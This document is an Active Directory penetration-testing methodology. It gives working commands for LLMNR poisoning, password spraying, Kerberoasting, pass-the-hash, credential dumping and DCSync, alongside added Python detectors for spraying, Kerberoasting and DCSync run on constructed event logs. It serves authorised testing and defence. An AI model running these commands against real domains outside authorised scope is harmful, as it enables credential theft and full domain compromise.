Active Directory Testing Methodology

Overview

Active Directory (AD) is the backbone of most enterprise Windows environments, managing authentication, authorization, and resource access. Compromising AD often means gaining control of the entire domain. This methodology covers the step-by-step approach to testing AD environments, from initial enumeration through domain compromise.

Prerequisites

Before testing AD:

  • Scope confirmation — which domains, forests, and OUs are in scope
  • Credentials — starting position (unauthenticated, domain user, or local admin on one workstation)
  • Network position — internal network access, VPN, or through a compromised external host
  • Restrictions — confirm whether password spraying, Kerberoasting, and DCSync are permitted
  • Domain controllers — identify DC IPs and hostnames

Phase 1: Unauthenticated Enumeration

Start without credentials to determine what is exposed.

Network Discovery

# Nmap — find domain controllers and AD services
# https://nmap.org/
nmap -sV -p 53,88,135,139,389,445,464,636,3268,3269 10.0.0.0/24

# Identify DCs by querying DNS for SRV records
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
dig SRV _ldap._tcp.dc._msdcs.<domain>

Null Session Enumeration

# NetExec — test null session
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u '' -p '' --shares
netexec smb <dc> -u '' -p '' --users
netexec smb <dc> -u '' -p '' --groups

# enum4linux-ng — comprehensive null session enumeration
# https://github.com/cddmp/enum4linux-ng
enum4linux-ng -A <dc>

# rpcclient — null session RPC queries
rpcclient -U '' -N <dc> -c 'enumdomusers'
rpcclient -U '' -N <dc> -c 'enumdomgroups'

LLMNR/NBT-NS Poisoning

If on the same network segment, capture credentials via name resolution poisoning:

# Responder — poison LLMNR/NBT-NS/mDNS
# https://github.com/lgandx/Responder
sudo responder -I eth0 -dwv

Captured NetNTLMv2 challenge-responses can be cracked offline or relayed to hosts that do not enforce SMB signing.

Phase 2: Authenticated Enumeration

Once you have at least one set of domain credentials, enumerate the entire domain.

Domain Reconnaissance

# NetExec — enumerate with credentials
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u <user> -p '<password>' --users
netexec smb <dc> -u <user> -p '<password>' --groups
netexec smb <dc> -u <user> -p '<password>' --shares

# Impacket — get domain users
# https://github.com/fortra/impacket
impacket-lookupsid <domain>/<user>:<password>@<dc>

BloodHound Collection

BloodHound maps AD relationships and identifies attack paths:

# BloodHound — collect all AD data
# https://github.com/SpecterOps/BloodHound
bloodhound-python -u <user> -p '<password>' -d <domain> -dc <dc> -c All

Key BloodHound queries to run:

  • Shortest path to Domain Admins
  • Users with DCSync rights
  • Kerberoastable users
  • AS-REP roastable users
  • Computers where domain users have local admin
  • Users with constrained/unconstrained delegation

LDAP Enumeration

# ldapsearch — query AD via LDAP
ldapsearch -x -H ldap://<dc> -D '<domain>\<user>' -w '<password>' -b 'DC=domain,DC=com' '(objectClass=user)' sAMAccountName

Phase 3: Credential Attacks

Password Spraying

Test a small number of common passwords against all domain users:

# NetExec — password spray (one password at a time to avoid lockout)
# https://github.com/Pennyw0rth/NetExec
netexec smb <dc> -u users.txt -p 'Spring2026!' --continue-on-success
netexec smb <dc> -u users.txt -p 'Password1' --continue-on-success

Check the domain password policy first to avoid lockouts:

# NetExec — get password policy
netexec smb <dc> -u <user> -p '<password>' --pass-pol
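A spray stays under the lockout threshold by design: each account sees only one or two failures, so per-account counters never fire. The signal a defender has is the fan-out per source, many distinct accounts failing from one IP in a short window. The following detector, added here as an example and not part of the original methodology, applies that logic to constructed Windows Security event 4625 records (timestamp, TargetUserName, IpAddress, SubStatus); the account names and addresses are hypothetical.

```python
"""Detect a password spray in Windows Security event 4625 (logon failure)
records. Added example, not part of the original methodology; the records are
constructed, not from a real domain."""
from collections import defaultdict
from datetime import datetime, timedelta

SUB_BAD_PASSWORD = "0xC000006A"   # SubStatus: account exists, wrong password
SUB_NO_SUCH_USER = "0xC0000064"   # SubStatus: account does not exist (stale name in a sprayed user list)

# Constructed 4625 records: (timestamp, TargetUserName, IpAddress, SubStatus)
SAMPLE_4625 = [
    # one password tried against many accounts from 10.0.0.50, 30 s apart
    ("2026-03-02T09:00:01", "alice",      "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:00:31", "bob",        "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:01:01", "carol",      "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:01:31", "dave",       "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:02:01", "erin",       "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:02:31", "frank",      "10.0.0.50", SUB_BAD_PASSWORD),
    ("2026-03-02T09:03:01", "svc_backup", "10.0.0.50", SUB_NO_SUCH_USER),
    # one account failing repeatedly from 10.0.0.77: brute force, not a spray
    ("2026-03-02T09:05:00", "gina", "10.0.0.77", SUB_BAD_PASSWORD),
    ("2026-03-02T09:05:05", "gina", "10.0.0.77", SUB_BAD_PASSWORD),
    ("2026-03-02T09:05:10", "gina", "10.0.0.77", SUB_BAD_PASSWORD),
    ("2026-03-02T09:05:15", "gina", "10.0.0.77", SUB_BAD_PASSWORD),
    # a user mistyping their own password once: benign noise
    ("2026-03-02T09:10:00", "alice", "10.0.0.12", SUB_BAD_PASSWORD),
]


def detect_spray(records, window=timedelta(minutes=10), min_accounts=5):
    """Return {source_ip: {"accounts": [...], "unknown_accounts": [...]}} for
    every source that failed against >= min_accounts distinct accounts inside
    any sliding `window`. Names that do not exist (SUB_NO_SUCH_USER) are listed
    separately: a real user rarely mistypes a name that is not in the domain."""
    by_ip = defaultdict(list)
    for ts, user, ip, sub in records:
        by_ip[ip].append((datetime.fromisoformat(ts), user.lower(), sub))
    hits = {}
    for ip, evs in by_ip.items():
        evs.sort()                      # chronological, so the window can slide
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1              # drop events that fell out of the window
            if len({u for _, u, _ in evs[start:end + 1]}) >= min_accounts:
                hits[ip] = {
                    "accounts": sorted({u for _, u, _ in evs}),
                    "unknown_accounts": sorted({u for _, u, s in evs if s == SUB_NO_SUCH_USER}),
                }
                break
    return hits


if __name__ == "__main__":
    for ip, info in detect_spray(SAMPLE_4625).items():
        print(f"{ip}: {len(info['accounts'])} accounts, unknown: {info['unknown_accounts']}")
```

Tune `min_accounts` and `window` against the observation window and lockout threshold returned by `--pass-pol`: a spray that respects the policy spreads attempts over at least one observation window, so the detection window should be no shorter than that.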

Kerberoasting

Request TGS tickets for service accounts and crack them offline:

# Impacket — request Kerberoastable TGS tickets
# https://github.com/fortra/impacket
impacket-GetUserSPNs <domain>/<user>:<password> -dc-ip <dc> -request -outputfile kerberoast.txt

# Hashcat — crack TGS-REP hashes (etype 23)
# https://hashcat.net/hashcat/
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
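Hashcat mode 13100 cracks RC4 (etype 23) service tickets, which is why the defender-side check for this phase keys on event 4769 records whose TicketEncryptionType is 0x17 for a non-machine account, and on one principal pulling tickets for many service accounts within seconds, the pattern `-request` produces. The detector below is an added example, not part of the original methodology; its 4769 records (timestamp, TargetUserName, ServiceName, TicketEncryptionType, IpAddress) are constructed and the names are hypothetical.

```python
"""Flag Kerberoasting indicators in Windows Security event 4769 (TGS request)
records. Added example, not part of the original methodology; the records are
constructed, not from a real domain."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4 (etype 23), the type hashcat -m 13100 cracks

# Constructed 4769 records: (timestamp, TargetUserName, ServiceName, TicketEncryptionType, IpAddress)
SAMPLE_4769 = [
    ("2026-03-02T10:00:00", "alice@CORP.EXAMPLE",   "WEB01$",     "0x12", "10.0.0.12"),  # machine SPN, AES256: normal
    ("2026-03-02T10:00:02", "alice@CORP.EXAMPLE",   "krbtgt",     "0x12", "10.0.0.12"),  # TGT renewal: ignore
    ("2026-03-02T10:15:00", "bob@CORP.EXAMPLE",     "svc_sql",    "0x17", "10.0.0.12"),  # one RC4 ticket: review
    ("2026-03-02T11:00:00", "mallory@CORP.EXAMPLE", "svc_sql",    "0x17", "10.0.0.50"),  # burst of RC4 tickets
    ("2026-03-02T11:00:01", "mallory@CORP.EXAMPLE", "svc_web",    "0x17", "10.0.0.50"),
    ("2026-03-02T11:00:01", "mallory@CORP.EXAMPLE", "svc_backup", "0x17", "10.0.0.50"),
    ("2026-03-02T11:00:02", "mallory@CORP.EXAMPLE", "svc_report", "0x17", "10.0.0.50"),
]


def is_service_account(name):
    """Machine accounts end in '$' and krbtgt is the KDC itself; tickets for
    those are routine and are not the roasting target."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoast(records, window=timedelta(minutes=5), min_services=3):
    """Return {requester: {"rc4_services": [...], "burst": bool}} for every
    requester that obtained an RC4 ticket for a non-machine account. `burst`
    is True when the requester fetched tickets for >= min_services distinct
    service accounts inside `window`."""
    by_user = defaultdict(list)
    for ts, user, svc, etype, _ip in records:
        if is_service_account(svc):
            by_user[user].append((datetime.fromisoformat(ts), svc, etype))
    findings = {}
    for user, evs in by_user.items():
        rc4 = sorted({svc for _, svc, et in evs if et == RC4_HMAC})
        if not rc4:
            continue                    # AES-only requesters are not roastable traffic
        evs.sort()
        burst, start = False, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({svc for _, svc, _ in evs[start:end + 1]}) >= min_services:
                burst = True
                break
        findings[user] = {"rc4_services": rc4, "burst": burst}
    return findings


if __name__ == "__main__":
    for user, f in detect_kerberoast(SAMPLE_4769).items():
        print(f"{user}: rc4={f['rc4_services']} burst={f['burst']}")
```

A single RC4 ticket can be a legitimate client talking to an account that has no AES keys, which is exactly what the "disable RC4, enforce AES" remediation removes; the burst is what separates routine use from collection.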

AS-REP Roasting

Target accounts that do not require Kerberos pre-authentication:

# Impacket — AS-REP roasting
# https://github.com/fortra/impacket
impacket-GetNPUsers <domain>/ -dc-ip <dc> -usersfile users.txt -format hashcat -outputfile asrep.txt

# Hashcat — crack AS-REP hashes (etype 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Phase 4: Lateral Movement

Use compromised credentials to move through the network.

Identifying Targets

# NetExec — check which hosts the credentials grant local admin on (NetExec marks them "Pwn3d!")
# https://github.com/Pennyw0rth/NetExec
netexec smb targets.txt -u <user> -p '<password>' --local-auth   # --local-auth: <user> is a local account on each host
netexec smb targets.txt -u <user> -H '<ntlm_hash>'                # domain account, NTLM hash instead of password

Remote Execution Methods

# Impacket — PsExec (creates a service)
# https://github.com/fortra/impacket
impacket-psexec <domain>/<user>:<password>@<target>

# Impacket — WMI execution (no service created)
impacket-wmiexec <domain>/<user>:<password>@<target>

# Impacket — SMBExec
impacket-smbexec <domain>/<user>:<password>@<target>

# Evil-WinRM — PowerShell remoting
# https://github.com/Hackplayers/evil-winrm
evil-winrm -i <target> -u <user> -p '<password>'

# NetExec — execute commands across multiple hosts
netexec smb targets.txt -u <user> -p '<password>' -x 'whoami'

Pass-the-Hash

# NetExec — pass-the-hash
netexec smb <target> -u <user> -H '<ntlm_hash>'

# Impacket — PtH with psexec
impacket-psexec <domain>/<user>@<target> -hashes :<ntlm_hash>

Phase 5: Privilege Escalation to Domain Admin

Credential Dumping

On compromised hosts with local admin access:

# NetExec — dump SAM database
# https://github.com/Pennyw0rth/NetExec
netexec smb <target> -u <admin> -p '<password>' --sam

# NetExec — dump LSA secrets
netexec smb <target> -u <admin> -p '<password>' --lsa

# Impacket — secretsdump (remote, no binary on disk)
# https://github.com/fortra/impacket
impacket-secretsdump <domain>/<admin>:<password>@<target>

ACL Abuse

If BloodHound reveals exploitable ACLs (GenericAll, GenericWrite, WriteDACL, ForceChangePassword on high-value targets):

  • GenericAll on user — reset password or set SPN for Kerberoasting
  • GenericWrite on user — modify attributes (e.g., set SPN)
  • WriteDACL on domain — grant yourself DCSync rights
  • ForceChangePassword — change target user's password directly

Delegation Attacks

  • Unconstrained delegation — a compromised host configured for unconstrained delegation caches the TGTs of every user that authenticates to it; extract those TGTs
  • Constrained delegation — use S4U2Self and S4U2Proxy to impersonate users to target services
  • Resource-based constrained delegation (RBCD) — if you control a computer object, configure RBCD to impersonate users
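Every exposure in the Kerberoasting, AS-REP roasting and delegation sections above is a flag on the account object, so the same conditions can be audited from an LDAP export before any ticket is requested. The script below is an added example, not part of the original methodology: it parses ldapsearch-style LDIF and reports accounts with DONT_REQ_PREAUTH, user accounts carrying an SPN (and whether msDS-SupportedEncryptionTypes leaves them RC4-only, the condition the "disable RC4, enforce AES" remediation addresses), TRUSTED_FOR_DELEGATION on non-DC accounts, msDS-AllowedToDelegateTo targets, and msDS-AllowedToActOnBehalfOfOtherIdentity. The LDIF is constructed; the account names, hostnames and the base64 RBCD value are hypothetical placeholders.

```python
"""Audit an ldapsearch (LDIF) export for AS-REP roastable accounts,
Kerberoastable users, RC4-only settings and all three delegation types.
Added example, not from the original methodology; the LDIF is constructed."""
import base64

# userAccountControl bits (AD schema constants)
UAC_ACCOUNTDISABLE = 0x0002
UAC_WORKSTATION_TRUST = 0x1000
UAC_SERVER_TRUST = 0x2000                        # domain controllers
UAC_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UAC_DONT_REQ_PREAUTH = 0x400000                 # AS-REP roastable
UAC_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
ENC_AES = 0x8 | 0x10                            # msDS-SupportedEncryptionTypes: AES128 | AES256

# Constructed ldapsearch output. The base64 RBCD value is a placeholder; the
# real attribute is a binary security descriptor.
SAMPLE_LDIF = """\
dn: CN=svc_sql,OU=Service Accounts,DC=corp,DC=example
sAMAccountName: svc_sql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.corp.example:1433
msDS-SupportedEncryptionTypes: 4

dn: CN=legacyapp,OU=Service Accounts,DC=corp,DC=example
sAMAccountName: legacyapp
userAccountControl: 4260352

dn: CN=WEB01,OU=Servers,DC=corp,DC=example
sAMAccountName: WEB01$
userAccountControl: 528384

dn: CN=APP02,OU=Servers,DC=corp,DC=example
sAMAccountName: APP02$
userAccountControl: 16781312
msDS-AllowedToDelegateTo: cifs/fs01.corp.example

dn: CN=FS01,OU=Servers,DC=corp,DC=example
sAMAccountName: FS01$
userAccountControl: 4096
msDS-AllowedToActOnBehalfOfOtherIdentity:: Y29uc3RydWN0ZWQtc2VjdXJpdHktZGVzY3JpcHRvcg==

dn: CN=alice,OU=Users,DC=corp,DC=example
sAMAccountName: alice
userAccountControl: 512

search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Minimal LDIF reader: one dict per entry (attribute -> list of values).
    Unfolds continuation lines, decodes 'attr:: base64' values, skips '#'
    comments and drops trailer blocks such as 'result: 0 Success' (no dn)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and lines:      # folded continuation line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, entry = [], {}
    for line in lines + [""]:
        if not line.strip():                   # blank line closes an entry
            if "dn" in entry:
                entries.append(entry)
            entry = {}
            continue
        attr, _, value = line.partition(":")   # split on the first colon only
        if value.startswith(":"):              # 'attr:: <base64>' binary value
            value = base64.b64decode(value[1:].strip())
        else:
            value = value.strip()
        entry.setdefault(attr, []).append(value)
    return entries


def audit(entries):
    """Return sorted (sAMAccountName, finding) pairs for enabled accounts."""
    findings = []
    for e in entries:
        name = e.get("sAMAccountName", ["?"])[0]
        uac = int(e.get("userAccountControl", ["0"])[0])
        if uac & UAC_ACCOUNTDISABLE:
            continue                           # disabled accounts cannot be targeted
        is_computer = bool(uac & (UAC_WORKSTATION_TRUST | UAC_SERVER_TRUST))
        if uac & UAC_DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable: DONT_REQ_PREAUTH set"))
        if "servicePrincipalName" in e and not is_computer and name.lower() != "krbtgt":
            findings.append((name, "Kerberoastable: user account with SPN"))
            enc = e.get("msDS-SupportedEncryptionTypes")
            if enc is None:
                findings.append((name, "msDS-SupportedEncryptionTypes unset: etype follows the domain default, confirm AES is enforced"))
            elif not int(enc[0]) & ENC_AES:
                findings.append((name, "RC4-only: msDS-SupportedEncryptionTypes has no AES bit"))
        # DCs legitimately carry TRUSTED_FOR_DELEGATION; any other account with it is a finding
        if uac & UAC_TRUSTED_FOR_DELEGATION and not uac & UAC_SERVER_TRUST:
            findings.append((name, "Unconstrained delegation: TRUSTED_FOR_DELEGATION set"))
        for target in e.get("msDS-AllowedToDelegateTo", []):
            mode = "with protocol transition" if uac & UAC_TRUSTED_TO_AUTH_FOR_DELEGATION else "Kerberos-only"
            findings.append((name, f"Constrained delegation to {target} ({mode})"))
        if "msDS-AllowedToActOnBehalfOfOtherIdentity" in e:
            findings.append((name, "RBCD configured: msDS-AllowedToActOnBehalfOfOtherIdentity is set, review which principals it grants"))
    return sorted(findings)


if __name__ == "__main__":
    for name, finding in audit(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: {finding}")
```

To run it against a real export, feed it the output of the ldapsearch command from the LDAP Enumeration section with the attributes above added to the attribute list; the audit then doubles as the checklist for the ACL-hygiene and Kerberos-configuration remediation items.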

DCSync

With sufficient privileges (Replicating Directory Changes and Replicating Directory Changes All on the domain object):

# Impacket — DCSync to extract all domain hashes
# https://github.com/fortra/impacket
impacket-secretsdump <domain>/<admin>:<password>@<dc>

# Extract specific user (e.g., krbtgt for Golden Ticket)
impacket-secretsdump <domain>/<admin>:<password>@<dc> -just-dc-user krbtgt
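Replication requests are audited on the DC as event 4662 with the replication extended-right GUIDs in the Properties field, so a DCSync shows up as a non-DC principal exercising those rights. The detector below is an added example, not part of the original methodology: it filters constructed 4662 records by the control-access bit and the replication GUIDs and suppresses known replicators (DC machine accounts and an allow-list for directory synchronisation services). The account names and addresses are hypothetical.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662
records. Added example, not part of the original methodology; the records are
constructed and the account names are hypothetical."""

# Extended-right GUIDs that appear in a 4662 Properties field when a caller
# exercises directory replication rights (the rights DCSync relies on).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for "control access" (extended rights)

GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed 4662 records; Properties carries the GUID list from the event.
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "IpAddress": "10.0.0.6", "AccessMask": "0x100",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},              # DC-to-DC replication: expected
    {"SubjectUserName": "svc_adsync", "IpAddress": "10.0.0.20", "AccessMask": "0x100",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},              # sync service: allow-listed
    {"SubjectUserName": "jdoe", "IpAddress": "10.0.0.50", "AccessMask": "0x100",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},              # user from a workstation: alert
    {"SubjectUserName": "jdoe", "IpAddress": "10.0.0.50", "AccessMask": "0x100",
     "Properties": ["{00000000-0000-0000-0000-000000000000}"]},  # unrelated right (placeholder GUID)
    {"SubjectUserName": "jdoe", "IpAddress": "10.0.0.50", "AccessMask": "0x10",
     "Properties": [GET_CHANGES]},                               # no control-access bit: not a right use
]


def detect_dcsync(records, dc_accounts, allowlist=()):
    """Return sorted (user, ip, rights) tuples for callers that exercised a
    replication right and are neither a DC machine account nor allow-listed.
    dc_accounts would normally be read from the Domain Controllers OU."""
    trusted = {a.lower() for a in dc_accounts} | {a.lower() for a in allowlist}
    hits = set()
    for r in records:
        if not int(r["AccessMask"], 16) & CONTROL_ACCESS:
            continue
        guids = (p.strip("{}").lower() for p in r["Properties"])
        rights = tuple(sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS))
        if not rights or r["SubjectUserName"].lower() in trusted:
            continue
        hits.add((r["SubjectUserName"], r["IpAddress"], rights))
    return sorted(hits)


if __name__ == "__main__":
    for user, ip, rights in detect_dcsync(SAMPLE_4662, {"DC01$", "DC02$"}, {"svc_adsync"}):
        print(f"{user} from {ip}: {', '.join(rights)}")
```

The allow-list is the weak point of this rule: an attacker who obtains the sync service's credentials inherits its exemption, so the allow-listed accounts are themselves Tier 0 assets and belong with the DCs in the remediation priorities.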

Phase 6: Domain Persistence

Document persistence mechanisms without leaving them active. These demonstrate the impact of domain compromise:

  • Golden Ticket — forge TGTs using the krbtgt hash (provides unlimited domain access)
  • Silver Ticket — forge TGS tickets for specific services
  • Skeleton Key — patch LSASS on DC to accept a master password (highly invasive, document only)
  • AdminSDHolder — add user to AdminSDHolder ACL for persistent admin access
  • DCShadow — register a rogue DC (document only, do not execute without explicit permission)

Reporting Considerations

AD findings should clearly communicate the attack chain:

  1. Initial access — how credentials were first obtained
  2. Escalation path — step-by-step from initial user to Domain Admin
  3. Impact — what domain compromise means for the organization (full control of all Windows systems, email, file shares, etc.)
  4. Remediation priorities:
     • Tier 0 assets (DCs, PKI, AD admin accounts) — remediate first
     • Service account passwords — enforce strong, rotated passwords
     • Kerberos configuration — disable RC4, enforce AES
     • ACL hygiene — remove excessive permissions
     • Network segmentation — limit lateral movement paths
